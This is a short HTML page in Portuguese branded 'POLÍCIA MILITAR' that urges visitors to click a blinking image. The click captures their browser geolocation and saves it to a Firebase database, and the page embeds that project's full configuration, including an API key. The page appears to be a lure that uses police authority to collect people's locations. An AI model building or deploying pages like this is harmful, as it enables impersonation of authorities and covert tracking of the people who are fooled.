<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Enviar Localização para o Firebase</title>
<style>
    body {
        font-family: Arial, sans-serif;
        text-align: center;
        background: black; /* Cor de fundo preta */
        color: white; /* Cor do texto branca */
        margin: 0;
        padding: 0;
    }

    #content {
        max-width: 90%; /* Largura máxima de 90% */
        margin: 0 auto;
        padding: 20px;
        background-color: rgba(0, 0, 0, 0.5); /* Fundo semi-transparente */
        border-radius: 10px; /* Borda arredondada */
    }

    img#sendLocationBtn {
        display: block;
        margin: 20px auto;
        width: 100px; /* Largura da imagem */
        cursor: pointer;
        animation: blink-animation 1s infinite; /* Animação de piscar */
    }

    @keyframes blink-animation {
        0% { opacity: 1; } /* 0% de opacidade (totalmente visível) */
        50% { opacity: 0; } /* 50% de opacidade (invisível) */
        100% { opacity: 1; } /* 100% de opacidade (totalmente visível) */
    }

    /* Estilos específicos para telas menores que 600px de largura */
    @media screen and (max-width: 600px) {
        #content {
            padding: 10px; /* Reduz o padding */
        }
        img#sendLocationBtn {
            width: 80px; /* Reduz a largura da imagem */
        }
    }
</style>
</head>
<body>
<div id="content">
    <h1>POLÍCIA MILITAR</h1>
	<h2>CLIQUE NA IMAGEM</h2>
    <img id="sendLocationBtn" src="raio.png" alt="Enviar Localização" onclick="sendLocation()">
</div>

<script src="https://www.gstatic.com/firebasejs/8.4.2/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.4.2/firebase-database.js"></script>
<script>
// Configuração do Firebase
var firebaseConfig = {
    apiKey: "AIzaSyDLRj4IZfFHztmoHnHYJ1pAV0V5EiRo1W4",
    authDomain: "kgeral-f09db.firebaseapp.com",
    databaseURL: "https://kgeral-f09db-default-rtdb.firebaseio.com",
    projectId: "kgeral-f09db",
    storageBucket: "kgeral-f09db.appspot.com",
    messagingSenderId: "573980768382",
    appId: "1:573980768382:web:d4e0d2edc74fe1fbdb402f",
    measurementId: "G-Y829R42LEC"
};

// Inicialização do Firebase
firebase.initializeApp(firebaseConfig);
const database = firebase.database();

function sendLocation() {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(function(position) {
            const latitude = position.coords.latitude;
            const longitude = position.coords.longitude;
            saveToFirebase(latitude, longitude);
        }, function(error) {
            console.error("Erro ao obter localização: ", error);
            alert("Erro ao obter localização. Por favor, permita o acesso à sua localização e tente novamente.");
        });
    } else {
        alert("Geolocalização não é suportada por este navegador.");
    }
}

function saveToFirebase(latitude, longitude) {
    const newKey = firebase.database().ref().child('locations').push().key;
    firebase.database().ref('locations/' + newKey).set({
        latitude: latitude,
        longitude: longitude
    }).then(function() {
        alert("Localização enviada com sucesso!");
    }).catch(function(error) {
        console.error("Erro ao enviar localização para o Firebase: ", error);
        alert("Erro ao enviar localização para o Firebase. Por favor, tente novamente.");
    });
}
</script>
</body>
</html>
